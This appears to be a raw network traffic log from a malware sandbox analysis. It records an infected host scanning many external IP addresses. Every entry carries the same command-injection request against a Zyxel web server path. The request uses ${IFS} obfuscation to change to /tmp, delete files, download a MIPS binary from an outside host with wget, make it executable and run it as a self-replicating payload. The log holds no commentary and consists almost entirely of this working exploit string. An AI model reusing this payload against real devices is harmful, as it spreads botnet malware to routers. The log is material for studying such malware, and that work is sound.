                                                        Feb 2, 2024 06:21:04.835838079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3224192.168.2.1447770156.107.208.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835858107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3225192.168.2.145920883.14.3.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835894108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3226192.168.2.1443382118.125.51.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835933924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3227192.168.2.1454430160.52.200.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.835987091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3228192.168.2.144360854.24.35.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836016893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3229192.168.2.1433882158.232.208.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836059093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3230192.168.2.1440272154.161.153.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836086988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3231192.168.2.1450852151.23.52.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836157084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3232192.168.2.143474653.154.148.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836205006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3233192.168.2.1455466206.145.10.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836216927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3234192.168.2.14609505.193.138.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836268902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3235192.168.2.1460240122.23.121.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836308956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3236192.168.2.1458752173.252.215.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836335897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3237192.168.2.145187874.218.235.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836359978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3238192.168.2.144817835.177.232.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836410046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3239192.168.2.1450864158.37.60.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836448908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3240192.168.2.1433818149.70.223.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836482048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3241192.168.2.1456630107.151.149.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836515903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3242192.168.2.145379613.180.37.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836569071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3243192.168.2.1440392172.67.134.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836600065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3244192.168.2.1444744206.133.249.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836636066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3245192.168.2.145044482.212.71.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836689949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3246192.168.2.1448180176.106.106.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836715937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3247192.168.2.143649681.94.244.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836764097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3248192.168.2.1438114173.232.142.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836795092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3249192.168.2.145593474.157.63.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836828947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3250192.168.2.1437384166.52.189.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836874008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3251192.168.2.144362253.175.0.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836908102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3252192.168.2.1450248187.223.39.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836936951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3253192.168.2.144715452.132.107.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.836993933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3254192.168.2.1452928186.216.101.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837024927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3255192.168.2.1446656222.70.224.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837058067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3256192.168.2.144147449.109.49.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837097883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3257192.168.2.1439208194.171.209.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837116003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3258192.168.2.145040080.181.97.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837163925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3259192.168.2.1434826148.48.138.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837203979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3260192.168.2.1434598174.212.192.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837244034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3261192.168.2.1440772132.202.188.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837266922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3262192.168.2.14598889.145.30.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837317944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3263192.168.2.1457618166.152.255.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837373018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3264192.168.2.1460972113.170.66.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837430000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3265192.168.2.1460910152.169.142.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837471008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3266192.168.2.143378284.197.253.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837505102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3267192.168.2.144901638.197.165.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837531090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3268192.168.2.144586497.144.114.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837590933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3269192.168.2.144559635.166.253.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837611914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3270192.168.2.1450152203.45.130.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837647915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3271192.168.2.1444600186.20.240.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837690115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3272192.168.2.1444836133.136.63.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837713957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3273192.168.2.1448064188.124.184.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837760925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3274192.168.2.1440760185.131.202.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837795019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3275192.168.2.143724835.132.217.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837817907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3276192.168.2.1436922223.176.106.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837862968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3277192.168.2.1449150189.162.252.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837899923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3278192.168.2.143735614.31.95.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837949991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3279192.168.2.144391265.11.107.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.837985992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3280192.168.2.1440870114.120.82.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838041067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3281192.168.2.1434162200.40.238.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838076115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3282192.168.2.1455184186.59.7.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838107109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3283192.168.2.146070640.77.49.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838138103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3284192.168.2.1459598166.118.65.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838157892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3285192.168.2.1441780102.155.45.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:04.838211060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3286192.168.2.14476784.251.5.132443
                                                        TimestampBytes transferredDirectionData
